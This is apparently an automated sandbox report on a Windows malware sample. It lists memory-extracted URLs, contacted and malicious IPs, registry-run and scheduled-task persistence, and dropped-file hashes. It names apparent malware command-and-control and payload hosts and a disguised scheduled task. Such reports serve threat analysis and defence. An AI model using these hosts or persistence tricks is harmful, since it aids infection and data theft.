                                                                                                                                                        https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protectionsfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            http://exslt.org/dates-and-timesfirefox.exe, 00000018.00000002.2876308896.000001C7ACD61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta4508a44a11.exe, 00000007.00000002.3493485997.00000000037A1000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000002.3561115822.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3279457717.000000000365C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2876308896.000001C7ACDAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2768410210.0000021311AC7000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2741225467.0000028B8E0F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                http://ocsp.rootca1.amazontrust.com0:6f9ea40b81.exe, 00000008.00000003.3257988281.0000000003670000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://win.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 00000018.00000002.2982566429.000001C7AD37D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://www.ecosia.org/newtab/4508a44a11.exe, 00000007.00000002.3493485997.00000000037E6000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3135724212.000000000369C000.00000004.00000800.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3137886274.0000000003699000.00000004.00000800.00020000.00000000.sdmp, b6866cbf49.exe, 0000001B.00000003.2866684670.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://www.youtube.com/firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://t.me/detct0rd0wntgMozilla/5.04508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://80.82.65.70/dll/download409be480dc7.exe, 00000024.00000002.4217329063.00000000055C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shieldfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                              https://zonedw.sbs/L4508a44a11.exe, 00000007.00000003.2382303961.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://127.0.0.1:firefox.exe, 00000018.00000002.3234540323.000001C7B0FA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2811533571.000001C7A166B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                    https://bugzilla.mofirefox.exe, 00000018.00000002.3434753983.000001C7B344F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://mitmdetection.services.mozilla.com/firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                        https://amazon.comfirefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://fightlsoser.click/P6f9ea40b81.exe, 00000008.00000003.3612914512.00000000011E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2621000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3384694589.000001C7B250E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.04508a44a11.exe, 00000007.00000003.2330717903.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://ac.duckduckgo.com/ac/LOAD_ANONYMOUS_ALLOW_CLIENT_CERTUnknownfirefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapturefirefox.exe, 00000018.00000002.3039047204.000001C7AD60C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://spocs.getpocket.com/firefox.exe, 00000018.00000002.3104720613.000001C7AE36E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples4508a44a11.exe, 00000007.00000002.3493485997.0000000003714000.00000004.00000020.00020000.00000000.sdmp, 6f9ea40b81.exe, 00000008.00000003.3154546114.0000000003683000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://services.addons.mozilla.org/api/v4/abuse/report/addon/firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-ffirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              https://zonedw.sbs/04508a44a11.exe, 00000007.00000003.2405855755.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2485098768.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2460403135.000000000072F000.00000004.00000020.00020000.00000000.sdmp, 4508a44a11.exe, 00000007.00000003.2431108684.000000000072F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://screenshots.firefox.com/shims/mochitest-shim-2.jsfirefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_rfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://monitor.firefox.com/user/breach-stats?includeResolved=truefirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-reportfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://support.mozilla.org/kb/website-translationtranslations-panel-settings-always-translate-unknofirefox.exe, 00000018.00000002.3384694589.000001C7B2518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://safebrowsing.google.com/safebrowsing/diagnostic?site=firefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://www.inbox.lv/rfc2368/?value=%sufirefox.exe, 00000018.00000002.3157826140.000001C7AF6DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.phplb6866cbf49.exe, 0000001B.00000002.3298144707.0000000001476000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://monitor.firefox.com/user/dashboardfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://firefox.settings.services.mozilla.com/v1Parentfirefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cfirefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_IDfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                        https://www.tsn.cafirefox.exe, 00000018.00000002.3710032406.000001C7B553D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            https://monitor.firefox.com/aboutfirefox.exe, 00000018.00000002.3139767060.000001C7AE890000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2763951005.00000213116D0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2782930527.0000028B8E6C0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                              http://mozilla.org/MPL/2.0/.firefox.exe, 00000018.00000002.3613036647.000001C7B4AC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3613036647.000001C7B4A89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3434753983.000001C7B344F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3220756752.000001C7B0CF0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3523724049.000001C7B3B0A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3282028922.000001C7B15EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3255714715.000001C7B1107000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3444229709.000001C7B3659000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3291788969.000001C7B1683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3291788969.000001C7B1603000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                185.215.113.16
                                                                                                                                                                                                                                                		unknownPortugal
                                                                                                                                                                                                                                                		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                                                		unknownunknownfalse
                                                                                                                                                                                                                                                185.215.113.206
                                                                                                                                                                                                                                                		unknownPortugal
                                                                                                                                                                                                                                                		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                35.190.72.216
                                                                                                                                                                                                                                                		prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                104.21.35.43
                                                                                                                                                                                                                                                		fightlsoser.clickUnited States
                                                                                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                142.250.181.132
                                                                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                                                                		15169GOOGLEUSfalse

                                                                                                                                                                                                                                                Private

                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                192.168.2.148
                                                                                                                                                                                                                                                192.168.2.149
                                                                                                                                                                                                                                                192.168.2.146
                                                                                                                                                                                                                                                192.168.2.147
                                                                                                                                                                                                                                                192.168.2.140
                                                                                                                                                                                                                                                192.168.2.141
                                                                                                                                                                                                                                                192.168.2.144
                                                                                                                                                                                                                                                192.168.2.145
                                                                                                                                                                                                                                                192.168.2.142
                                                                                                                                                                                                                                                192.168.2.143
                                                                                                                                                                                                                                                192.168.2.159
                                                                                                                                                                                                                                                192.168.2.157
                                                                                                                                                                                                                                                192.168.2.158
                                                                                                                                                                                                                                                192.168.2.151
                                                                                                                                                                                                                                                192.168.2.152
                                                                                                                                                                                                                                                192.168.2.150
                                                                                                                                                                                                                                                192.168.2.155
                                                                                                                                                                                                                                                192.168.2.156
                                                                                                                                                                                                                                                192.168.2.153
                                                                                                                                                                                                                                                192.168.2.154
                                                                                                                                                                                                                                                192.168.2.126
                                                                                                                                                                                                                                                192.168.2.247
                                                                                                                                                                                                                                                192.168.2.127
                                                                                                                                                                                                                                                192.168.2.248
                                                                                                                                                                                                                                                192.168.2.124
                                                                                                                                                                                                                                                192.168.2.245
                                                                                                                                                                                                                                                192.168.2.125
                                                                                                                                                                                                                                                192.168.2.246
                                                                                                                                                                                                                                                192.168.2.128
                                                                                                                                                                                                                                                192.168.2.249
                                                                                                                                                                                                                                                192.168.2.129
                                                                                                                                                                                                                                                192.168.2.240
                                                                                                                                                                                                                                                192.168.2.122
                                                                                                                                                                                                                                                192.168.2.243
                                                                                                                                                                                                                                                192.168.2.123
                                                                                                                                                                                                                                                192.168.2.244
                                                                                                                                                                                                                                                192.168.2.120
                                                                                                                                                                                                                                                192.168.2.241
                                                                                                                                                                                                                                                192.168.2.121
                                                                                                                                                                                                                                                192.168.2.242
                                                                                                                                                                                                                                                192.168.2.97
                                                                                                                                                                                                                                                192.168.2.137
                                                                                                                                                                                                                                                192.168.2.96
                                                                                                                                                                                                                                                192.168.2.138
                                                                                                                                                                                                                                                192.168.2.99
                                                                                                                                                                                                                                                192.168.2.135
                                                                                                                                                                                                                                                192.168.2.98
                                                                                                                                                                                                                                                192.168.2.136
                                                                                                                                                                                                                                                192.168.2.139
                                                                                                                                                                                                                                                192.168.2.250
                                                                                                                                                                                                                                                192.168.2.130
                                                                                                                                                                                                                                                192.168.2.251
                                                                                                                                                                                                                                                192.168.2.91
                                                                                                                                                                                                                                                192.168.2.90
                                                                                                                                                                                                                                                192.168.2.93
                                                                                                                                                                                                                                                192.168.2.133
                                                                                                                                                                                                                                                192.168.2.254
                                                                                                                                                                                                                                                192.168.2.92
                                                                                                                                                                                                                                                192.168.2.134
                                                                                                                                                                                                                                                192.168.2.95
                                                                                                                                                                                                                                                192.168.2.131
                                                                                                                                                                                                                                                192.168.2.252
                                                                                                                                                                                                                                                192.168.2.94
                                                                                                                                                                                                                                                192.168.2.132
                                                                                                                                                                                                                                                192.168.2.253
                                                                                                                                                                                                                                                192.168.2.104
                                                                                                                                                                                                                                                192.168.2.225
                                                                                                                                                                                                                                                192.168.2.105
                                                                                                                                                                                                                                                192.168.2.226
                                                                                                                                                                                                                                                192.168.2.102
                                                                                                                                                                                                                                                192.168.2.223
                                                                                                                                                                                                                                                192.168.2.103
                                                                                                                                                                                                                                                192.168.2.224
                                                                                                                                                                                                                                                192.168.2.108
                                                                                                                                                                                                                                                192.168.2.229
                                                                                                                                                                                                                                                192.168.2.109
                                                                                                                                                                                                                                                192.168.2.106
                                                                                                                                                                                                                                                192.168.2.227
                                                                                                                                                                                                                                                192.168.2.107
                                                                                                                                                                                                                                                192.168.2.228
                                                                                                                                                                                                                                                192.168.2.100
                                                                                                                                                                                                                                                192.168.2.221
                                                                                                                                                                                                                                                192.168.2.101
                                                                                                                                                                                                                                                192.168.2.222
                                                                                                                                                                                                                                                192.168.2.220
                                                                                                                                                                                                                                                192.168.2.115
                                                                                                                                                                                                                                                192.168.2.236
                                                                                                                                                                                                                                                192.168.2.116
                                                                                                                                                                                                                                                192.168.2.237
                                                                                                                                                                                                                                                192.168.2.113
                                                                                                                                                                                                                                                192.168.2.234
                                                                                                                                                                                                                                                192.168.2.114
                                                                                                                                                                                                                                                192.168.2.235
                                                                                                                                                                                                                                                192.168.2.119

                                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                Analysis ID:1574690
                                                                                                                                                                                                                                                Start date and time:2024-12-13 13:50:15 +01:00
                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                Overall analysis duration:0h 20m 46s
                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                Number of analysed new started processes analysed:55
                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal100.rans.spre.troj.spyw.expl.evad.winEXE@113/1458@13/100
                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                                • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe, svchost.exe
                                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 2.22.50.144, 192.229.221.95, 142.250.181.99, 172.217.19.206, 64.233.163.84, 172.217.17.46, 142.250.181.3, 172.217.21.35, 64.233.164.84, 142.250.181.142, 172.217.17.67, 88.221.134.209, 4.175.87.197, 13.107.246.63, 23.218.208.109, 20.190.177.146, 52.168.117.173, 104.208.16.94, 20.42.65.92, 20.42.73.28
                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, spocs.getpocket.com, clientservices.googleapis.com, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, ocsp.digicert.com, us-west1.prod.sumo.prod.webservices.mozgcp.net, login.live.com, ipv4only.arpa, firefox.settings.services.mozilla.com, prod.ads.prod.webservices.mozgcp.net, www.youtube.com, www.gstatic.com, normandy-cdn.services.mozilla.com, star-mini.c10r.facebook.com, prod.balrog.prod.cloudops.mozgcp.net, fs.microsoft.com, shavar.prod.mozaws.net, detectportal.firefox.com, dyna.wikimedia.org, normandy.cdn.mozilla.net, youtube-ui.l.google.com, reddit.map.fastly.net, umwatson.events.data.microsoft.com, shavar.services.mozilla.com, clients.l.google.com, location.services.mozilla.com, example.org, prod.detectportal.prod.cloudops.mozgcp.net, www.reddit.com, services.addons.mozilla.org, ciscobinary.openh264.org, incoming.telemetry.mozilla.org, contile.services.mozilla.com, prod.content-signature-chains.prod.webservices.mozgcp.n
                                                                                                                                                                                                                                                • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                • VT rate limit hit for: file.exe

                                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                                07:52:01API Interceptor16078328x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                07:52:56API Interceptor153606x Sleep call for process: b6866cbf49.exe modified
                                                                                                                                                                                                                                                07:53:28API Interceptor9x Sleep call for process: 6f9ea40b81.exe modified
                                                                                                                                                                                                                                                07:53:31API Interceptor444294x Sleep call for process: 09be480dc7.exe modified
                                                                                                                                                                                                                                                07:53:32API Interceptor9x Sleep call for process: e614d88998.exe modified
                                                                                                                                                                                                                                                07:54:37API Interceptor38755x Sleep call for process: 4ZD5C3i.exe modified
                                                                                                                                                                                                                                                12:51:12Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                12:52:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 955e8e90f4.exe C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe
                                                                                                                                                                                                                                                12:52:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b6866cbf49.exe C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                12:52:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 955e8e90f4.exe C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe
                                                                                                                                                                                                                                                12:53:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run b6866cbf49.exe C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                12:53:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fa1ce2a324.exe C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe
                                                                                                                                                                                                                                                12:53:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fa1ce2a324.exe C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe
                                                                                                                                                                                                                                                12:53:37Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

                                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800896
                                                                                                                                                                                                                                                Entropy (8bit):7.6867737478406655
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:Rr9CI6UBHK2NocwiN/jc41p3qp11JsqnRLNfWe1xTVIl+qWOHPjnikEpx/nLWvyO:Rr7HfYP1Js4nOkSyOHTiRPnLWvyO
                                                                                                                                                                                                                                                MD5:EE4C1F4C1238E2557429A55FA3D81A2B
                                                                                                                                                                                                                                                SHA1:18578802F20056B8904986C7BA7D5542849D2C7F
                                                                                                                                                                                                                                                SHA-256:04E7547A187A072417187FEDC30100E6C7F2D1AA769CB7E930F78B95A953942F
